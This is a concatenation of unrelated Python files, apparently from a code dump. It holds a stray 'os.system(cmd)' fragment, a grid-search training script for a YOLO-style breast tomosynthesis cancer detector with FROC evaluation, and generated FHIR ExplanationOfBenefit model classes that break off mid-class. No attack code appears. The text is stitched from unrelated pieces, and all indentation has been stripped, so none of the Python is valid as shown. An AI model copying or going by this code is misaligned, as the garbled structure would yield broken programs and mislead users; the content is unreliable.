os.system(cmd)
|
40439
|
import argparse
import os
import mlflow
import numpy as np
import pandas as pd
import torch
import torch.optim as optim
from matplotlib import pyplot as plt
from matplotlib.backends.backend_agg import FigureCanvasAgg
from mlflow import log_metric, log_param, get_artifact_uri
from skimage.io import imsave
from sklearn.model_selection import ParameterGrid
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader
from tqdm import tqdm
from dataset import TomoDetectionDataset as Dataset
from dense_yolo import DenseYOLO
from loss import objectness_module, LocalizationLoss
from sampler import TomoBatchSampler
from transform import transforms
def main(args):
torch.backends.cudnn.benchmark = True
device = torch.device("cpu" if not torch.cuda.is_available() else args.device)
loader_train, loader_valid = data_loaders(args)
loaders = {"train": loader_train, "valid": loader_valid}
hparams_dict = {
"block_config": [(1, 3, 2, 6, 4), (2, 6, 4, 12, 8)],
"num_init_features": [8, 16],
"growth_rate": [8, 16],
"bn_size": [2, 4],
}
hparams = list(ParameterGrid(hparams_dict)) # 16 configs
loss_params_dict = [
{"loss": ["CE", "weighted-CE"], "alpha": [0.25, 0.5, 1.0]}, # 6 configs
{"loss": ["focal"], "alpha": [0.25, 0.5, 1.0], "gamma": [0.5, 1.0, 2.0]}, # 9 configs
{
"loss": ["reduced-focal"],
"alpha": [0.25, 0.5, 1.0],
"gamma": [0.5, 1.0, 2.0],
"reduce_th": [0.5],
} # 9 configs
] # 24 configs
loss_params = list(ParameterGrid(loss_params_dict))
loss_params = loss_params * 2 # 48 configs
try:
mlflow.set_tracking_uri(args.mlruns_path)
experiment_id = (
args.experiment_id
if args.experiment_id
else mlflow.create_experiment(name=args.experiment_name)
)
except Exception as _:
print("experiment-id must be unique")
return
for i, loss_param in tqdm(enumerate(loss_params)):
for j, hparam in enumerate(hparams):
with mlflow.start_run(experiment_id=experiment_id):
mlflow_log_params(loss_param, hparam)
try:
yolo = DenseYOLO(img_channels=1, out_channels=Dataset.out_channels, **hparam)
yolo.to(device)
objectness_loss = objectness_module(
name=loss_param["loss"], args=argparse.Namespace(**loss_param)
)
localization_loss = LocalizationLoss(weight=args.loc_weight)
optimizer = optim.Adam(yolo.parameters(), lr=args.lr)
early_stop = args.patience
run_tpr2 = 0.0
run_tpr1 = 0.0
run_auc = 0.0
for _ in range(args.epochs):
if early_stop == 0:
break
for phase in ["train", "valid"]:
if phase == "train":
yolo.train()
early_stop -= 1
else:
yolo.eval()
df_validation_pred = pd.DataFrame()
valid_target_nb = 0
for data in loaders[phase]:
x, y_true = data
x, y_true = x.to(device), y_true.to(device)
optimizer.zero_grad()
with torch.set_grad_enabled(phase == "train"):
y_pred = yolo(x)
obj = objectness_loss(y_pred, y_true)
loc = localization_loss(y_pred, y_true)
total_loss = obj + loc
if phase == "train":
total_loss.backward()
clip_grad_norm_(yolo.parameters(), 0.5)
optimizer.step()
else:
y_true_np = y_true.detach().cpu().numpy()
valid_target_nb += np.sum(y_true_np[:, 0])
df_batch_pred = evaluate_batch(y_pred, y_true)
df_validation_pred = df_validation_pred.append(
df_batch_pred, ignore_index=True, sort=False
)
if phase == "valid":
tpr, fps = froc(df_validation_pred, valid_target_nb)
epoch_tpr2 = np.interp(2.0, fps, tpr)
epoch_tpr1 = np.interp(1.0, fps, tpr)
if epoch_tpr2 > run_tpr2:
early_stop = args.patience
run_tpr2 = epoch_tpr2
run_tpr1 = epoch_tpr1
run_auc = np.trapz(tpr, fps)
torch.save(
yolo.state_dict(),
os.path.join(get_artifact_uri(), "yolo.pt"),
)
imsave(
os.path.join(get_artifact_uri(), "froc.png"),
plot_froc(fps, tpr),
)
log_metric("TPR2", run_tpr2)
log_metric("TPR1", run_tpr1)
log_metric("AUC", run_auc)
except Exception as e:
print(
"{:0>2d}/{} | {} {}".format(
j + 1, len(hparams), hparams[j], type(e).__name__
)
)
def mlflow_log_params(loss_param, hparam):
for key in loss_param:
log_param(key, loss_param[key])
log_param("loss_fun", str(loss_param))
for key in hparam:
log_param(key, hparam[key])
log_param("network", str(hparam))
def data_loaders(args):
dataset_train, dataset_valid = datasets(args)
sampler_train = TomoBatchSampler(
batch_size=args.batch_size, data_frame=dataset_train.data_frame
)
def worker_init(worker_id):
np.random.seed(42 + worker_id)
loader_train = DataLoader(
dataset_train,
batch_sampler=sampler_train,
num_workers=args.workers,
worker_init_fn=worker_init,
)
loader_valid = DataLoader(
dataset_valid,
batch_size=args.batch_size,
drop_last=False,
num_workers=args.workers,
worker_init_fn=worker_init,
)
return loader_train, loader_valid
def datasets(args):
train = Dataset(
csv_views=args.data_views,
csv_bboxes=args.data_boxes,
root_dir=args.images,
subset="train",
random=True,
only_biopsied=args.only_biopsied,
transform=transforms(train=True),
skip_preprocessing=True,
downscale=args.downscale,
max_slice_offset=args.slice_offset,
seed=args.seed,
)
valid = Dataset(
csv_views=args.data_views,
csv_bboxes=args.data_boxes,
root_dir=args.images,
subset="validation",
random=False,
transform=transforms(train=False),
skip_preprocessing=True,
downscale=args.downscale,
max_slice_offset=args.slice_offset,
seed=args.seed,
)
return train, valid
def froc(df, targets_nb):
total_slices = len(df.drop_duplicates(subset=["PID"]))
total_tps = targets_nb
tpr = [0.0]
fps = [0.0]
max_fps = 4.0
thresholds = sorted(df[df["TP"] == 1]["Score"], reverse=True)
for th in thresholds:
df_th = df[df["Score"] >= th]
df_th_unique_tp = df_th.drop_duplicates(subset=["PID", "TP", "GTID"])
num_tps_th = float(sum(df_th_unique_tp["TP"]))
tpr_th = num_tps_th / total_tps
num_fps_th = float(len(df_th[df_th["TP"] == 0]))
fps_th = num_fps_th / total_slices
if fps_th > max_fps:
tpr.append(tpr[-1])
fps.append(max_fps)
break
tpr.append(tpr_th)
fps.append(fps_th)
if np.max(fps) < max_fps:
tpr.append(tpr[-1])
fps.append(max_fps)
return tpr, fps
def plot_froc(fps, tpr, color="darkorange", linestyle="-"):
fig = plt.figure(figsize=(10, 8))
canvas = FigureCanvasAgg(fig)
plt.plot(fps, tpr, color=color, linestyle=linestyle, lw=2)
plt.xlim([0.0, 4.0])
plt.xticks(np.arange(0.0, 4.5, 0.5))
plt.ylim([0.0, 1.0])
plt.yticks(np.arange(0.0, 1.1, 0.1))
plt.tick_params(axis="both", which="major", labelsize=16)
plt.xlabel("Mean FPs per slice", fontsize=24)
plt.ylabel("Sensitivity", fontsize=24)
plt.grid(color="silver", alpha=0.3, linestyle="--", linewidth=1)
plt.tight_layout()
canvas.draw()
plt.close()
s, (width, height) = canvas.print_to_buffer()
return np.frombuffer(s, np.uint8).reshape((height, width, 4))
def is_tp(pred_box, true_box, min_dist=50):
# box: center point + dimensions
pred_y, pred_x = pred_box["Y"], pred_box["X"]
gt_y, gt_x = true_box["Y"], true_box["X"]
# distance between GT and predicted center points
dist = np.sqrt((pred_x - gt_x) ** 2 + (pred_y - gt_y) ** 2)
# TP radius based on GT box size
dist_threshold = np.sqrt(true_box["Width"] ** 2 + true_box["Height"] ** 2) / 2.
dist_threshold = max(dist_threshold, min_dist)
# TP if predicted center within GT radius
return dist <= dist_threshold
def evaluate_batch(y_pred, y_true):
y_pred = y_pred.detach().cpu().numpy()
y_true = y_true.detach().cpu().numpy()
df_eval = pd.DataFrame()
for i in range(y_pred.shape[0]):
df_gt_boxes = pred2boxes(y_true[i], threshold=1.0)
df_gt_boxes["GTID"] = np.random.randint(10e10) * (1 + df_gt_boxes["X"])
df_pred_boxes = pred2boxes(y_pred[i])
df_pred_boxes["PID"] = np.random.randint(10e12)
df_pred_boxes["TP"] = 0
df_pred_boxes["GTID"] = np.random.choice(
list(set(df_gt_boxes["GTID"])), df_pred_boxes.shape[0]
)
for index, pred_box in df_pred_boxes.iterrows():
tp_list = [
(j, is_tp(pred_box, x_box)) for j, x_box in df_gt_boxes.iterrows()
]
if any([tp[1] for tp in tp_list]):
tp_index = [tp[0] for tp in tp_list if tp[1]][0]
df_pred_boxes.at[index, "TP"] = 1
df_pred_boxes.at[index, "GTID"] = df_gt_boxes.at[tp_index, "GTID"]
df_eval = df_eval.append(df_pred_boxes, ignore_index=True, sort=False)
return df_eval
def pred2boxes(pred, threshold=None):
# box: center point + dimensions
anchor = Dataset.anchor
cell_size = Dataset.cell_size
np.nan_to_num(pred, copy=False)
obj_th = pred[0]
if threshold is None:
threshold = min(0.001, np.max(obj_th) * 0.5)
obj_th[obj_th < threshold] = 0
yy, xx = np.nonzero(obj_th)
scores = []
xs = []
ys = []
ws = []
hs = []
for i in range(len(yy)):
scores.append(pred[0, yy[i], xx[i]])
h = int(anchor[0] * pred[3, yy[i], xx[i]] ** 2)
hs.append(h)
w = int(anchor[1] * pred[4, yy[i], xx[i]] ** 2)
ws.append(w)
y_offset = pred[1, yy[i], xx[i]]
y_mid = yy[i] * cell_size + (cell_size / 2) + (cell_size / 2) * y_offset
ys.append(int(y_mid))
x_offset = pred[2, yy[i], xx[i]]
x_mid = xx[i] * cell_size + (cell_size / 2) + (cell_size / 2) * x_offset
xs.append(int(x_mid))
df_dict = {"Score": scores, "X": xs, "Y": ys, "Width": ws, "Height": hs}
df_boxes = pd.DataFrame(df_dict)
df_boxes.sort_values(by="Score", ascending=False, inplace=True)
return df_boxes
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Hyper-parameters grid search for YOLO model for cancer detection in Duke DBT volumes"
)
parser.add_argument(
"--batch-size",
type=int,
default=16,
help="input batch size for training (default: 16)",
)
parser.add_argument(
"--epochs",
type=int,
default=100,
help="number of epochs to train (default: 100)",
)
parser.add_argument(
"--patience",
type=int,
default=25,
help="early stopping: number of epochs to wait for improvement (default: 25)",
)
parser.add_argument(
"--lr", type=float, default=0.001, help="initial learning rate (default: 0.001)"
)
parser.add_argument(
"--loc-weight",
type=float,
default=0.5,
help="weight of localization loss (default: 0.5)",
)
parser.add_argument(
"--device",
type=str,
default="cuda:1",
help="device for training (default: cuda:1)",
)
parser.add_argument(
"--workers",
type=int,
default=4,
help="number of workers for data loading (default: 4)",
)
parser.add_argument(
"--data-views",
type=str,
default="/data/data_train_v2.csv",
help="csv file listing training views together with category label",
)
parser.add_argument(
"--data-boxes",
type=str,
default="/data/bboxes_v2.csv",
help="csv file defining ground truth bounding boxes",
)
parser.add_argument(
"--images",
type=str,
default="/data/TomoImagesPP/",
help="root folder with preprocessed images",
)
parser.add_argument(
"--seed",
type=int,
default=42,
help="random seed for validation split (default: 42)",
)
parser.add_argument(
"--downscale",
type=int,
default=2,
help="input image downscale factor (default 2)",
)
parser.add_argument(
"--experiment-name",
type=str,
default="0",
help="experiment name for new mlflow (default: 0)",
)
parser.add_argument(
"--experiment-id",
type=str,
default=None,
help="experiment id to restore in-progress mlflow experiment (default: None)",
)
parser.add_argument(
"--mlruns-path",
type=str,
default="/data/mlruns",
help="path for mlflow results (default: /data/mlruns)",
)
parser.add_argument(
"--slice-offset",
type=int,
default=0,
help="maximum offset from central slice to consider as GT bounding box (default: 0)",
)
parser.add_argument(
"--only-biopsied",
default=True, # set to true by default for convenience
action="store_true",
help="flag to use only biopsied cases",
)
args = parser.parse_args()
main(args)
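# Illustrative invocation sketch (the script name and paths below are assumptions):
#
#     python train_grid_search.py --data-views /data/data_train_v2.csv \
#         --data-boxes /data/bboxes_v2.csv --images /data/TomoImagesPP/ \
#         --device cuda:0 --experiment-name yolo-grid-search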
|
40567
|
from .fhirbase import fhirbase
class ExplanationOfBenefit(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
resourceType: This is a ExplanationOfBenefit resource
identifier: The EOB Business Identifier.
status: The status of the resource instance.
type: The category of claim, e.g., oral, pharmacy, vision, institutional,
professional.
subType: A finer grained suite of claim subtype codes which may convey
Inpatient vs Outpatient and/or a specialty service. In the US the
BillType.
patient: Patient Resource.
billablePeriod: The billable period for which charges are being
submitted.
created: The date when the EOB was created.
enterer: The person who created the explanation of benefit.
insurer: The insurer which is responsible for the explanation of
benefit.
provider: The provider which is responsible for the claim.
organization: The provider which is responsible for the claim.
referral: The referral resource which lists the date, practitioner,
reason and other supporting information.
facility: Facility where the services were provided.
claim: The business identifier for the instance: invoice number, claim
number, pre-determination or pre-authorization number.
claimResponse: The business identifier for the instance: invoice
number, claim number, pre-determination or pre-authorization number.
outcome: Processing outcome: error, partial or complete processing.
disposition: A description of the status of the adjudication.
related: Other claims which are related to this claim such as prior
claim versions or for related services.
prescription: Prescription to support the dispensing of Pharmacy or
Vision products.
originalPrescription: Original prescription which has been superseded
by this prescription to support the dispensing of pharmacy services,
medications or products. For example, a physician may prescribe a
medication which the pharmacy determines is contraindicated, or for
which the patient has an intolerance, and therefore issues a new
prescription for an alternate medication which has the same therapeutic
intent. The prescription from the pharmacy becomes the 'prescription'
and that from the physician becomes the 'original prescription'.
payee: The party to be reimbursed for the services.
information: Additional information codes regarding exceptions,
special considerations, the condition, situation, prior or concurrent
issues. Often there are multiple jurisdiction-specific value sets which
are required.
careTeam: The members of the team who provided the overall service as
well as their role and whether responsible and qualifications.
diagnosis: Ordered list of patient diagnosis for which care is sought.
procedure: Ordered list of patient procedures performed to support the
adjudication.
precedence: Precedence (primary, secondary, etc.).
insurance: Financial instrument by which payment information for
health care.
accident: An accident which resulted in the need for healthcare
services.
employmentImpacted: The start and optional end dates of when the
patient was precluded from working due to the treatable condition(s).
hospitalization: The start and optional end dates of when the patient
was confined to a treatment center.
item: First tier of goods and services.
addItem: The first tier service adjudications for payor added
services.
totalCost: The total cost of the services reported.
unallocDeductable: The amount of deductible applied which was not
allocated to any particular service line.
totalBenefit: Total amount of benefit payable (Equal to sum of the
Benefit amounts from all detail lines and additions less the
Unallocated Deductible).
payment: Payment details for the claim if the claim has been paid.
form: The form to be used for printing the content.
processNote: Note text.
benefitBalance: Balance by Benefit Category.
"""
__name__ = 'ExplanationOfBenefit'
def __init__(self, dict_values=None):
self.resourceType = 'ExplanationOfBenefit'
# type: str
# possible values: ExplanationOfBenefit
self.status = None
# type: str
# possible values: active, cancelled, draft, entered-in-error
self.type = None
# reference to CodeableConcept
self.subType = None
# type: list
# reference to CodeableConcept
self.patient = None
# reference to Reference: identifier
self.billablePeriod = None
# reference to Period
self.created = None
# type: str
self.enterer = None
# reference to Reference: identifier
self.insurer = None
# reference to Reference: identifier
self.provider = None
# reference to Reference: identifier
self.organization = None
# reference to Reference: identifier
self.referral = None
# reference to Reference: identifier
self.facility = None
# reference to Reference: identifier
self.claim = None
# reference to Reference: identifier
self.claimResponse = None
# reference to Reference: identifier
self.outcome = None
# reference to CodeableConcept
self.disposition = None
# type: str
self.related = None
# type: list
# reference to ExplanationOfBenefit_Related
self.prescription = None
# reference to Reference: identifier
self.originalPrescription = None
# reference to Reference: identifier
self.payee = None
# reference to ExplanationOfBenefit_Payee
self.information = None
# type: list
# reference to ExplanationOfBenefit_Information
self.careTeam = None
# type: list
# reference to ExplanationOfBenefit_CareTeam
self.diagnosis = None
# type: list
# reference to ExplanationOfBenefit_Diagnosis
self.procedure = None
# type: list
# reference to ExplanationOfBenefit_Procedure
self.precedence = None
# type: int
self.insurance = None
# reference to ExplanationOfBenefit_Insurance
self.accident = None
# reference to ExplanationOfBenefit_Accident
self.employmentImpacted = None
# reference to Period
self.hospitalization = None
# reference to Period
self.item = None
# type: list
# reference to ExplanationOfBenefit_Item
self.addItem = None
# type: list
# reference to ExplanationOfBenefit_AddItem
self.totalCost = None
# reference to Money
self.unallocDeductable = None
# reference to Money
self.totalBenefit = None
# reference to Money
self.payment = None
# reference to ExplanationOfBenefit_Payment: identifier
self.form = None
# reference to CodeableConcept
self.processNote = None
# type: list
# reference to ExplanationOfBenefit_ProcessNote
self.benefitBalance = None
# type: list
# reference to ExplanationOfBenefit_BenefitBalance
self.identifier = None
# type: list
# reference to Identifier
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.status is not None:
if self.status.lower() not in [
'active', 'cancelled', 'draft', 'entered-in-error']:
raise ValueError('"{}" does not match possible values: {}'.format(
self.status, 'active, cancelled, draft, entered-in-error'))
def get_relationships(self):
return [
{'parent_entity': 'ExplanationOfBenefit_BenefitBalance',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'benefitBalance'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'prescription'},
{'parent_entity': 'ExplanationOfBenefit_AddItem',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'addItem'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'claimResponse'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'totalCost'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'unallocDeductable'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'provider'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'originalPrescription'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'subType'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'claim'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'totalBenefit'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'form'},
{'parent_entity': 'ExplanationOfBenefit_Procedure',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'procedure'},
{'parent_entity': 'ExplanationOfBenefit_Related',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'related'},
{'parent_entity': 'ExplanationOfBenefit_Insurance',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'insurance'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'type'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'patient'},
{'parent_entity': 'ExplanationOfBenefit_Information',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'information'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'hospitalization'},
{'parent_entity': 'ExplanationOfBenefit_Accident',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'accident'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'billablePeriod'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'referral'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'organization'},
{'parent_entity': 'ExplanationOfBenefit_ProcessNote',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'processNote'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'outcome'},
{'parent_entity': 'ExplanationOfBenefit_Item',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'item'},
{'parent_entity': 'ExplanationOfBenefit_Diagnosis',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'diagnosis'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'identifier'},
{'parent_entity': 'ExplanationOfBenefit_Payee',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'payee'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'insurer'},
{'parent_entity': 'ExplanationOfBenefit_Payment',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'payment'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'enterer'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'facility'},
{'parent_entity': 'ExplanationOfBenefit_CareTeam',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'careTeam'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'employmentImpacted'},
]
class ExplanationOfBenefit_Related(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
claim: Other claims which are related to this claim such as prior
claim versions or for related services.
relationship: For example prior or umbrella.
reference: An alternate organizational reference to the case or file
to which this particular claim pertains - e.g. Property/Casualty insurer
claim # or Workers Compensation case #.
"""
__name__ = 'ExplanationOfBenefit_Related'
def __init__(self, dict_values=None):
self.claim = None
# reference to Reference: identifier
self.relationship = None
# reference to CodeableConcept
self.reference = None
# reference to Identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Related',
'child_variable': 'reference'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Related',
'child_variable': 'claim'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Related',
'child_variable': 'relationship'},
]
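# Illustrative sketch only (not part of the generated model): assuming that
# fhirbase.set_attributes simply copies matching dictionary keys onto the instance, a
# related-claim entry can be built from a dict and its schema relationships listed.
# The field values below are hypothetical.
def _example_related_usage():
    related = ExplanationOfBenefit_Related({'relationship': {'coding': [{'code': 'prior'}]}})
    for rel in related.get_relationships():
        print(rel['parent_entity'], '->', rel['child_variable'])
    return related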
class ExplanationOfBenefit_Payee(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
type: Type of Party to be reimbursed: Subscriber, provider, other.
resourceType: organization | patient | practitioner | relatedperson.
party: Party to be reimbursed: Subscriber, provider, other.
"""
__name__ = 'ExplanationOfBenefit_Payee'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.resourceType = None
# reference to CodeableConcept
self.party = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payee',
'child_variable': 'resourceType'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Payee',
'child_variable': 'party'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payee',
'child_variable': 'type'},
]
class ExplanationOfBenefit_Information(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: Sequence of the information element which serves to provide
a link.
category: The general class of the information supplied: information;
exception; accident, employment; onset, etc.
code: System and code pertaining to the specific information regarding
special conditions relating to the setting, treatment or patient for
which care is sought which may influence the adjudication.
timingDate: The date when or period to which this information refers.
timingPeriod: The date when or period to which this information
refers.
valueString: Additional data or information such as resources,
documents, images etc. including references to the data or the actual
inclusion of the data.
valueQuantity: Additional data or information such as resources,
documents, images etc. including references to the data or the actual
inclusion of the data.
valueAttachment: Additional data or information such as resources,
documents, images etc. including references to the data or the actual
inclusion of the data.
valueReference: Additional data or information such as resources,
documents, images etc. including references to the data or the actual
inclusion of the data.
reason: For example, provides the reason for: the additional stay, or
missing tooth or any other situation where a reason code is required
in addition to the content.
"""
__name__ = 'ExplanationOfBenefit_Information'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.category = None
# reference to CodeableConcept
self.code = None
# reference to CodeableConcept
self.timingDate = None
# type: str
self.timingPeriod = None
# reference to Period
self.valueString = None
# type: str
self.valueQuantity = None
# reference to Quantity
self.valueAttachment = None
# reference to Attachment
self.valueReference = None
# reference to Reference: identifier
self.reason = None
# reference to Coding
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'valueReference'},
{'parent_entity': 'Attachment',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'valueAttachment'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'valueQuantity'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'code'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'reason'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'category'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'timingPeriod'},
]
class ExplanationOfBenefit_CareTeam(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: Sequence of careteam which serves to order and provide a
link.
provider: The members of the team who provided the overall service.
responsible: The practitioner who is billing and responsible for the
claimed services rendered to the patient.
role: The lead, assisting or supervising practitioner and their
discipline if a multidisciplinary team.
qualification: The qualification which is applicable for this service.
"""
__name__ = 'ExplanationOfBenefit_CareTeam'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.provider = None
# reference to Reference: identifier
self.responsible = None
# type: bool
self.role = None
# reference to CodeableConcept
self.qualification = None
# reference to CodeableConcept
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_CareTeam',
'child_variable': 'provider'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_CareTeam',
'child_variable': 'role'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_CareTeam',
'child_variable': 'qualification'},
]
class ExplanationOfBenefit_Diagnosis(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: Sequence of diagnosis which serves to provide a link.
diagnosisCodeableConcept: The diagnosis.
diagnosisReference: The diagnosis.
type: The type of the Diagnosis, for example: admitting, primary,
secondary, discharge.
packageCode: The package billing code, for example DRG, based on the
assigned grouping code system.
"""
__name__ = 'ExplanationOfBenefit_Diagnosis'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.diagnosisCodeableConcept = None
# reference to CodeableConcept
self.diagnosisReference = None
# reference to Reference: identifier
self.type = None
# type: list
# reference to CodeableConcept
self.packageCode = None
# reference to CodeableConcept
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Diagnosis',
'child_variable': 'type'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Diagnosis',
'child_variable': 'diagnosisReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Diagnosis',
'child_variable': 'packageCode'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Diagnosis',
'child_variable': 'diagnosisCodeableConcept'},
]
class ExplanationOfBenefit_Procedure(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: Sequence of procedures which serves to order and provide a
link.
date: Date and optionally time the procedure was performed .
procedureCodeableConcept: The procedure code.
procedureReference: The procedure code.
"""
__name__ = 'ExplanationOfBenefit_Procedure'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.date = None
# type: str
self.procedureCodeableConcept = None
# reference to CodeableConcept
self.procedureReference = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Procedure',
'child_variable': 'procedureCodeableConcept'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Procedure',
'child_variable': 'procedureReference'},
]
class ExplanationOfBenefit_Insurance(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
coverage: Reference to the program or plan identification, underwriter
or payor.
preAuthRef: A list of references from the Insurer to which these
services pertain.
"""
__name__ = 'ExplanationOfBenefit_Insurance'
def __init__(self, dict_values=None):
self.coverage = None
# reference to Reference: identifier
self.preAuthRef = None
# type: list
